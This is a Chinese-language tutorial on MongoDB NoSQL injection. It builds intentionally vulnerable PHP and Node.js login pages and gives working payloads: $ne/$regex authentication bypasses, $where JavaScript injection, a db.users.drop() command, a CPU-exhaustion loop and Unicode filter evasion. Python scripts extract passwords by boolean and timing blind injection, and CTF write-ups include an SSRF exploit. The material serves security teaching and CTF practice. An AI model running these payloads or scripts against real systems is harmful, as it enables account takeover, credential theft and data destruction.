Nosql 注入的简介
NoSQL 注入由于 NoSQL 本身的特性和传统的 SQL 注入有所区别。使用传统的SQL注入,攻击者利用不安全的用户输入来修改或替换应用程序发送到数据库引擎的 SQL 查询语句(或其他SQL语句)。
换句话说,SQL 注入使攻击者可以在数据库中 SQL 执行命令。
与关系数据库不同,NoSQL 数据库不使用通用查询语言。NoSQL 查询语法是特定于产品的,查询是使用应用程序的编程语言编写的:PHP,JavaScript,Python,Java 等。这意味着成功的注入使攻击者不仅可以在数据库中执行命令,而且可以在应用程序本身中执行命令,这可能更加危险。
以下是 OWASP 对于 Nosql 注入的介绍:
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren’t using the traditional SQL syntax. Because these NoSQL injection attacks may execute within a procedural language, rather than in the declarative SQL language, the potential impacts are greater than traditional SQL injection.
NoSQL database calls are written in the application’s programming language, a custom API call, or formatted according to a common convention (such as
XML
,JSON
,LINQ
, etc). Malicious input targeting those specifications may not trigger the primarily application sanitization checks. For example, filtering out common HTML special characters such as< > & ;
will not prevent attacks against a JSON API, where special characters include/ { } :
.
NoSQL 注入的分类
有两种 NoSQL 注入分类的方式:
第一种是按照语言的分类,可以分为:PHP 数组注入,JavaScript 注入和 Mongo Shell 拼接注入等等。
第二种是按照攻击机制分类,可以分为:重言式注入,联合查询注入,JavaScript 注入、盲注等,这种分类方式很像传统 SQL 注入的分类方式。
- 重言式注入
又称为永真式,此类攻击是在条件语句中注入代码,使生成的表达式判定结果永远为真,从而绕过认证或访问机制。
- 联合查询注入
联合查询是一种众所周知的 SQL 注入技术,攻击者利用一个脆弱的参数去改变给定查询返回的数据集。联合查询最常用的用法是绕过认证页面获取数据。
- JavaScript 注入
MongoDB Server 支持 JavaScript,这使得在数据引擎进行复杂事务和查询成为可能,但是传递不干净的用户输入到这些查询中可以注入任意的 JavaScript 代码,导致非法的数据获取或篡改。
- 盲注
当页面没有回显时,那么我们可以通过 $regex
正则表达式来达到和传统 SQL 注入中 substr()
函数相同的功能,而且 NoSQL 用到的基本上都是布尔盲注。
下面我们便通过 PHP 和 Nodejs 来讲解 MongoDB 注入的利用方式。
PHP 中的 MongoDB 注入
测试环境如下:
- Ubuntu
- PHP 7.4.21
- MongoDB Server 4.4.7
在 PHP 中使用 MongoDB 你必须使用 MongoDB 的 PHP 驱动:https://pecl.php.net/package/mongodb 。这里我们使用新版的 PHP 驱动来操作 MongoDB。一下实例均以 POST 请求方式为例。
重言式注入
首先在 MongoDB 中选中 test 数据库,创建一个 users 集合并插入文档数据:
> use test
switched to db test
>
> db.createCollection('users')
{ "ok" : 1 }
>
> db.users.insert({username: 'admin', password: '123456'})
WriteResult({ "nInserted" : 1 })
> db.users.insert({username: 'whoami', password: '657260'})
WriteResult({ "nInserted" : 1 })
> db.users.insert({username: 'bunny', password: '964795'})
WriteResult({ "nInserted" : 1 })
> db.users.insert({username: 'bob', password: '965379'})
WriteResult({ "nInserted" : 1 })
>
然后编写 index.php:
<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDB\Driver\Query(array(
'username' => $username,
'password' => $password
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo '====Login Success====<br>';
echo 'username:' . $user['username'] . '<br>';
echo 'password:' . $user['password'] . '<br>';
}
}
else{
echo 'Login Failed';
}
?>
如下,当正常用户想要登陆 whoami 用户时,POST 方法提交的数据如下:
username=whoami&password=657260
进入 PHP 后的程序数据如下:
array(
'username' => 'whoami',
'password' => '657260'
)
进入 MongoDB 后执行的查询命令为:
> db.users.find({'username':'whoami', 'password':'657260'})
{ "_id" : ObjectId("60fa9c80257f18542b68c4b9"), "username" : "whoami", "password" : "657260" }
我们从代码中可以看出,这里对用户输入没有做任何过滤与校验,那么我们可以通过 $ne
关键字构造一个永真的条件就可以完成 NoSQL 注入:
username[$ne]=1&password[$ne]=1
如下图所示,成功查出所有的用户信息,说明成功注入了一个永真查询条件:
提交的数据进入 PHP 后的数据如下:
array(
'username' => array('$ne' => 1),
'password' => array('$ne' => 1)
)
进入 MongoDB 后执行的查询命令为:
> db.users.find({'username':{$ne:1}, 'password':{$ne:1}})
{ "_id" : ObjectId("60fa9c7b257f18542b68c4b8"), "username" : "admin", "password" : "123456" }
{ "_id" : ObjectId("60fa9c80257f18542b68c4b9"), "username" : "whoami", "password" : "657260" }
{ "_id" : ObjectId("60fa9c85257f18542b68c4ba"), "username" : "bunny", "password" : "964795" }
{ "_id" : ObjectId("60fa9c88257f18542b68c4bb"), "username" : "bob", "password" : "965379" }
由于 users 集合中 username 和 password 都不等于 1,所以将所有的文档数据查出,这很可能是真实的,并且可能允许攻击者绕过身份验证。
对于 PHP 本身的特性而言,由于其松散的数组特性,导致如果我们发送 value=1
那么,也就是发送了一个 value
的值为 1 的数据。如果发送 value[$ne]=1
则 PHP 会将其转换为数组 value=array($ne=>1)
,当数据到了进入 MongoDB 后,原来一个单一的 {"value":1}
查询就变成了一个 {"value":{$ne:1}
条件查询。同样的,我们也可以使用下面这些作为 payload 进行攻击:
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$gte]=&password[$gte]=
这种重言式注入的方式也是我们通常用来验证网站是否存在 NoSQL 注入的第一步。不仅是 $ne
,只要可以构造用真条件就可以。
联合查询注入
在 MongoDB 之类的流行数据存储中,JSON 查询结构使得联合查询注入攻击变得比较复杂了,但也是可以实现的。
我们都知道,直接对 SQL 查询语句进行字符拼接串容易造成 SQL 注入,NoSQL 也有类似问题。如下实例,假设后端的 MongoDB 查询语句使用了字符串拼接:
string query = "{ username: '" + $username + "', password: '" + $password + "' }"
当用户正确的用户名密码进行登录时,得到的查询语句是应该这样的:
{'username':'admin', 'password':'123456'}
如果此时没有很好地对用户的输入进行过滤或者效验,那攻击者便可以构造如下 payload:
username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456
拼接入查询语句后相当于执行了:
{ username: 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: '123456'}
此时,只要用户名是正确的,这个查询就可以成功。这种手法和 SQL 注入比较相似:
select * from logins where username = 'admin' and (password true<> or ('a'='a' and password = ''))
这样,原本正常的查询语句会被转换为忽略密码的,在无需密码的情况下直接登录用户账号,因为 ()
内的条件总是永真的。
但是现在无论是 PHP 的 MongoDB Driver 还是 Nodejs 的 Mongoose 都必须要求查询条件必须是一个数组或者 Query 对象了,因此这用注入方法简单了解一下就好了。
JavaScript 注入
MongoDB Server 是支持 JavaScript 的,可以使用 JavaScript 进行一些复杂事务和查询,也允许在查询的时候执行 JavaScript 代码。但是如果传递不干净的用户输入到这些查询中,则可能会注入任意的 JavaScript 代码,导致非法的数据获取或篡改。
首先我们需要了解一下 $where
操作符。在 MongoDB 中,$where
操作符可以用来执行 JavaScript 代码,将 JavaScript 表达式的字符串或 JavaScript 函数作为查询语句的一部分。在 MongoDB 2.4 之前,通过 $where
操作符使用 map-reduce
、group
命令甚至可以访问到 Mongo Shell 中的全局函数和属性,如 db
,也就是说可以在自定义的函数里获取数据库的所有信息。
如下实例:
> db.users.find({ $where: "function(){return(this.username == 'whoami')}" })
{ "_id" : ObjectId("60fa9c80257f18542b68c4b9"), "username" : "whoami", "password" : "657260" }
>
由于使用了 $where
关键字,其后面的 JavaScript 将会被执行并返回 “whoami”,然后将查询出 username 为 whoami 的数据。
某些易受攻击的 PHP 应用程序在构建 MongoDB 查询时可能会直接插入未经过处理的用户输入,例如从变量中 $userData
获取查询条件:
db.users.find({ $where: "function(){return(this.username == $userData)}" })
然后,攻击者可能会注入一种恶意的字符串如 'a'; sleep(5000)
,此时 MongoDB 执行的查询语句为:
db.users.find({ $where: "function(){return(this.username == 'a'; sleep(5000))}" })
如果此时服务器有 5 秒钟的延迟则说明注入成功。
此外还有一个类似于 DOS 攻击的方式,可以让服务器 CPU 飙升到 100% 持续 5 秒:
db.users.find({ $where: "(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<5000); return Math.max();})();" })
下面我们编写 index.php 进行测试:
<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDB\Driver\Query(array(
'$where' => "function() {if(this.username == '".$username."' && this.password == '".$password."') {return true;}}"
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count>0) {
foreach ($result as $user) {
$user=(array)$user;
echo '====Login Success====<br>';
echo 'username: '.$user['username']."<br>";
echo 'password: '.$user['password']."<br>";
}
}
else{
echo 'Login Failed';
}
?>
如果此时我们发送以下这几种数据,便可以构造出相当于万能密码的效果:
username='||1) {return true;}})//&password=123456
如下图所示,成功查出所有的用户信息:
这是因为发送 payload 进入 PHP 后的数据如下:
array(
'$where' => "
function() {
if(this.username == ''||1) {return true;}})//' && this.password == '123456') {
return true;
}
}
")
进入 MongoDB 后执行的查询命令为:
> db.users.find({ $where: "function() {if(this.username == ''||1) {return true;}})//' && this.password == '123456') {return true;}}" })
{ "_id" : ObjectId("60fa9c7b257f18542b68c4b8"), "username" : "admin", "password" : "123456" }
{ "_id" : ObjectId("60fa9c80257f18542b68c4b9"), "username" : "whoami", "password" : "657260" }
{ "_id" : ObjectId("60fa9c85257f18542b68c4ba"), "username" : "bunny", "password" : "964795" }
{ "_id" : ObjectId("60fa9c88257f18542b68c4bb"), "username" : "bob", "password" : "965379" }
>
我们从代码中可以看出,password 中的 return true
使得整个 JavaScript 代码提前结束并返回了 true
,这样就构造出了一个永真的条件并完成了 NoSQL 注入。
MongoDB Driver 一般都提供直接执行 Shell 命令的方法,这些方式一般是不推荐使用的,但难免有人为了实现一些复杂的查询去使用。在 MongoDB 的服务器端可以通过 db.eval
方法来执行 JavaScript 脚本,如我们可以定义一个 JavaScript 函数,然后通过 db.eval
在服务器端来运行。
但是在 PHP 官网中就已经友情提醒了不要这样使用:
<?php
$m = new MongoDB\Driver\Manager;
// Don't do this!!!
$username = $_GET['field'];
// $username is set to "'); db.users.drop(); print('"
$cmd = new \MongoDB\Driver\Command( [
'eval' => "print('Hello, $username!');"
] );
$r = $m->executeCommand( 'dramio', $cmd );
?>
还有人喜欢用 Command 去实现 MongoDB 的 distinct
方法,如下:
<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$cmd = new MongoDB\Driver\Command( [
'eval' => "db.users.distinct('username',{'username':'$username'})"
] );
$result = $manager->executeCommand('test.users', $cmd)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo '====Login Success====<br>';
echo 'username:' . $user['username'] . '<br>';
echo 'password:' . $user['password'] . '<br>';
}
}
else{
echo 'Login Failed';
}
?>
这样都是很危险的,因为这个就相当于把 Mongo Shell 开放给了用户,如果此时构造下列 payload:
username=1'});db.users.drop();db.user.find({'username':'1
username=1'});db.users.insert({"username":"admin","password":123456"});db.users.find({'username':'1
则将改变原本的查询语句造成注入。如果当前应用连接数据库的权限恰好很高,我们能干的事情就更多了。
Nosql 盲注
当页面没有回显时,那么我们可以通过 $regex
等正则表达式来构造永真条件进行盲注, $regex
可以达到和传统 SQL 注入中 substr()
函数相同的功能。
我们用下面的代码演示:
- index.php
<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDB\Driver\Query(array(
'username' => $username,
'password' => $password
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo '====Login Success====<br>';
echo 'username:' . $user['username'] . '<br>';
echo 'password:' . $user['password'] . '<br>';
}
}
else{
echo 'Login Failed';
}
?>
布尔盲注重点在于怎么逐个提取字符,如下所示,在已知一个用户名的情况下判断密码的长度:
username=admin&password[$regex]=.{4} // 登录成功
username=admin&password[$regex]=.{5} // 登录成功
username=admin&password[$regex]=.{6} // 登录成功
username=admin&password[$regex]=.{7} // 登录失败
......
在 password[$regex]=.{6}
时可以成功登录,但在 password[$regex]=.{7}
时登录失败,说明该 whoami 用户的密码长度为 7。
提交的数据进入 PHP 后的数据如下:
array(
'username' => 'admin',
'password' => array('$regex' => '.{6}')
)
进入 MongoDB 后执行的查询命令为:
> db.users.find({'username':'admin', 'password':{$regex:'.{6}'}})
{ "_id" : ObjectId("60fa9c7b257f18542b68c4b8"), "username" : "admin", "password" : "123456" }
> db.users.find({'username':'admin', 'password':{$regex:'.{7}'}})
>
由于 whoami 用户的 password 长度为 6,所以查询条件 {'username':'admin', 'password':{$regex:'.{6}'}}
为真,便能成功登录,而 {'username':'admin', 'password':{$regex:'.{7}'}}
为假,自然也就登录不了。
知道 password 的长度之后我们便可以逐位提取 password 的字符了:
username=admin&password[$regex]=1.{5}
username=admin&password[$regex]=12.{4}
username=admin&password[$regex]=123.{3}
username=admin&password[$regex]=1234.{2}
username=admin&password[$regex]=12345.*
username=admin&password[$regex]=123456
或
username=admin&password[$regex]=^1
username=admin&password[$regex]=^12
username=admin&password[$regex]=^123
username=admin&password[$regex]=^1234
username=admin&password[$regex]=^12345
username=admin&password[$regex]=^123456
下面给出一个 MongoDB 盲注脚本:
import requests
import string
password = ''
url = 'http://192.168.226.148/index.php'
while True:
for c in string.printable:
if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:
# When the method is GET
get_payload = '?username=admin&password[$regex]=^%s' % (password + c)
# When the method is POST
post_payload = {
"username": "admin",
"password[$regex]": '^' + password + c
}
# When the method is POST with JSON
json_payload = """{"username":"admin", "password":{"$regex":"^%s"}}""" % (password + c)
#headers = {'Content-Type': 'application/json'}
#r = requests.post(url=url, headers=headers, data=json_payload) # 简单发送 json
r = requests.post(url=url, data=post_payload)
if 'Login Success' in r.text:
print("[+] %s" % (password + c))
password += c
# 输出如下:
# [+] 1
# [+] 12
# [+] 123
# [+] 1234
# [+] 12345
# [+] 123456
$where
操作符前面我们已经说到了,当页面没有数据会显时,我们也可以通过闭合 JavaScript 的代码构造盲注。这里要提一下,在 MongoDB 2.4 之前,通过 $where
操作符可以访问到 Mongo Shell 中的全局函数和属性,如 db
,也就是说可以在自定义的函数里获取数据库的所有信息。
我们用下面的代码演示:
- index.php
<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDB\Driver\Query(array(
'$where' => "function() {if(this.username == '".$username."' && this.password == '".$password."') {return true;}}"
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count>0) {
foreach ($result as $user) {
$user=(array)$user;
echo '====Login Success====<br>';
echo 'username: '.$user['username']."<br>";
echo 'password: '.$user['password']."<br>";
}
}
else{
echo 'Login Failed';
}
?>
此时没有回显了,但我们可以通过 $where
操作符访问到全局属性 db
,然后对这里面的数据进行盲注,比如:
username='||db.version()[0]=='2'){return true;}else{return false;}if('&password=123456
发送 payload,进入 PHP 后的数据如下:
array(
'$where' => "
function() {
if(this.username == ''||db.version()[0]=='2'){
return true;
}else{
return false;
}
if('' && this.password == '123456') {
return true;
}
}
")
如果 db.version()[0]=='2'
匹配正确则返回 true,然后登录成功,反之返回 false ,登陆失败。我们根据这一布尔条件进行判断即可逐个注出数据。但是 MongoDB 2.4 之后我们便无法访问到 db
属性了。
初次之外,我们还可以通过 substr
方法将指定用户的密码匹配出来,比如我们知道存在一个 admin 用户,那么我们可以将这个 admin 用户的密码匹配出来:
username=admin'%26%26this.password.substr(-1)=='6') {return true;}})//&password=1
username=admin'%26%26this.password.substr(-2)=='56') {return true;}})//&password=1
username=admin'%26%26this.password.substr(-3)=='456') {return true;}})//&password=1
username=admin'%26%26this.password.substr(-4)=='3456') {return true;}})//&password=1
username=admin'%26%26this.password.substr(-5)=='23456') {return true;}})//&password=1
username=admin'%26%26this.password.substr(-6)=='123456') {return true;}})//&password=1
# 最后得到密码为 123456
发送 payload 后进入 PHP 的数据如下:
array(
'$where' => "
function() {
if(this.username == 'admin' && this.password.substr(-1)=='6') {
return true;
}}//' && this.password == '123456') {return true;}
}
")
下面给出一个盲注脚本:
import requests
url = "http://192.168.219.130/"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
strings = "abcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()"
res = ""
for i in range(len(res)+1,30):
if len(res) == i-1:
for c in strings:
data = {
"username": "admin'&&this.password.substr(-" + str(i) + ")=='" + str(c + res) + "') {return true;}})//",
"password": "123456"
}
r = requests.post(url=url,headers=headers, data=data)
if "Login Success" in r.text:
res = c + res
print("[+] " + res)
break
else:
print("[-] Failed")
break
# 输出如下:
# [+] 6
# [+] 56
# [+] 456
# [+] 3456
# [+] 23456
# [+] 123456
时间盲注也很好理解了,还是用上面那个 index.php 演示,直接给出 payload:
username=admin'%26%26this.password.substr(-1)=='6') {sleep(2000);}})//&password=1
如果匹配正确则会有 2 秒的延迟,下面给出时间盲注脚本:
import time
import requests
url = "http://192.168.219.130/"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
strings = "abcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()"
res = ""
for i in range(len(res)+1,30):
if len(res) == i-1:
for c in strings:
data = {
"username": "admin'&&this.password.substr(-" + str(i) + ")=='" + str(c + res) + "') {sleep(2000);}})//",
"password": "123456"
}
times = time.time()
r = requests.post(url=url,headers=headers, data=data)
if time.time() - times >= 2:
res = c + res
print("[+] " + res)
break
else:
print("[-] Failed")
break
# 输出如下:
# [+] 6
# [+] 56
# [+] 456
# [+] 3456
# [+] 23456
# [+] 123456
Nodejs 中的 MongoDB 注入
在 Nodejs 中也存在 MongoDB 注入的问题,其中主要是重言式注入,通过构造永真式构造万能密码实现登录绕过。下面我们使用 Nodejs 中的 mongoose 模块操作 MongoDB 进行演示。
- server.js
var express = require('express');
var mongoose = require('mongoose');
var jade = require('jade');
var bodyParser = require('body-parser');
mongoose.connect('mongodb://localhost/test', { useNewUrlParser: true });
var UserSchema = new mongoose.Schema({
name: String,
username: String,
password: String
});
var User = mongoose.model('users', UserSchema);
var app = express();
app.set('views', __dirname);
app.set('view engine', 'jade');
app.get('/', function(req, res) {
res.render ("index.jade",{
message: 'Please Login'
});
});
app.use(bodyParser.json());
app.post('/', function(req, res) {
console.log(req.body)
User.findOne({username: req.body.username, password: req.body.password}, function (err, user) {
console.log(user)
if (err) {
return res.render('index.jade', {message: err.message});
}
if (!user) {
return res.render('index.jade', {message: 'Login Failed'});
}
return res.render('index.jade', {message: 'Welcome back ' + user.name + '!'});
});
});
var server = app.listen(8000, '0.0.0.0', function () {
var host = server.address().address
var port = server.address().port
console.log("listening on http://%s:%s", host, port)
});
- index.jade
h1 #{message}
p #{message}
运行 server.js 后,访问 8000 端口:
由于后端解析 JSON,所以我们发送 JSON 格式的 payload:
{"username":{"$ne":1},"password": {"$ne":1}}
如上图所示,成功登录。
在处理 MongoDB 查询时,经常会使用 JSON格式将用户提交的数据发送到服务端,如果目标过滤了 $ne
等关键字,我们可以使用 Unicode 编码绕过,因为 JSON 可以直接解析 Unicode。如下所示:
{"username":{"\u0024\u006e\u0065":1},"password": {"\u0024\u006e\u0065":1}}
// {"username":{"$ne":1},"password": {"$ne":1}}
Nosql 相关 CTF 例题
[2021 MRCTF]Half-Nosqli
进入题目,发现是一个Swagger UI:
有两个 Api 接口,一个是 /login
用于登录,另一个是 /home
可通过 url 属性进行 SSRF。我们可以编写脚本来访问这两个 Api 接口。首先访问 /home
接口报错,因为需要验证,所以思路应该是先访问 /login
接口进行登录,登录后拿到 token 再去访问 /home
接口。这里由于题目名提示了是 NoSQL,所以我们可以直接使用 NoSQL 的永真式绕过。
这里没有任何过滤,Exp 如下:
import requests
import json
url = "http://node.mrctf.fun:23000/"
json_data = {
"email": {"$ne": ""},
"password": {"$ne": ""}
}
res = requests.post(url=url+'login',json=json_data)
token = res.json()['token']
json_data2 = {
"url":"http://47.xxx.xxx.72:4000" # 通过这里的url值进行SSRF
}
headers = {
"Authorization":"Bearer "+token
}
res2 = requests.post(url=url+'home',json=json_data2,headers=headers)
print(res2)
这样我们便可以通过 /home
接口的 url 值进行SSRF了:
接下来是一个 HTTP 拆分攻击,详情请看:[2021 MRCTF]Half-Nosqli
[GKCTF 2021]hackme
进入题目,是一个登录框:
查看源码发现如下提示:
<!--doyounosql?-->
应该是 nosql 注入,随机登录抓包发现解析 json:
首先构造永真式:
{"username":{"$ne":1},"password": {"$ne":1}}
被检测了,使用 Unicode 编码成功绕过:
应该是通过 Nosql 盲注,让我们把 admin 的密码爆出来,根据以下条件进行布尔盲注:
{"msg":"登录了,但没完全登录"} // 真
{"msg":"登录失败"} // 假
如下编写盲注脚本:
import requests
import string
password = ''
url = 'http://node4.buuoj.cn:27409/login.php'
while True:
for c in string.printable:
if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:
# When the method is GET
get_payload = '?username=admin&password[$regex]=^%s' % (password + c)
# When the method is POST
post_payload = {
"username": "admin",
"password[$regex]": '^' + password + c
}
# When the method is POST with JSON
json_payload = """{"username":"admin", "password":{"\\u0024\\u0072\\u0065\\u0067\\u0065\\u0078":"^%s"}}""" % (password + c)
headers = {'Content-Type': 'application/json'}
r = requests.post(url=url, headers=headers, data=json_payload) # 简单发送 json
#r = requests.post(url=url, data=post_payload)
if '但没完全登录' in r.content.decode():
print("[+] %s" % (password + c))
password += c
# 输出:
# [+] 4
# [+] 42
# [+] 422
# [+] 4227
# [+] 42276
# [+] 422766
# ......
# [+] 42276606202db06ad1f29ab6b4a1
# [+] 42276606202db06ad1f29ab6b4a13
# [+] 42276606202db06ad1f29ab6b4a130
# [+] 42276606202db06ad1f29ab6b4a1307
# [+] 42276606202db06ad1f29ab6b4a1307f
得到 admin 密码后即可成功登录 admin。
Nosql 注入相关工具
Github上有个叫NoSQLAttack工具,不过已经没有维护了。
另外还有一个NoSQLMap工具,这个项目作者仍在维护。
Ending……
参考:
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
https://www.tr0y.wang/2019/04/21/MongoDB%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/index.html
https://cloud.tencent.com/developer/article/1602092
https://www.anquanke.com/post/id/97211#h2-10
https://www.runoob.com/mongodb/nosql.html
https://blog.szfszf.top/article/27/
https://github.com/youngyangyang04/NoSQLInjectionAttackDemo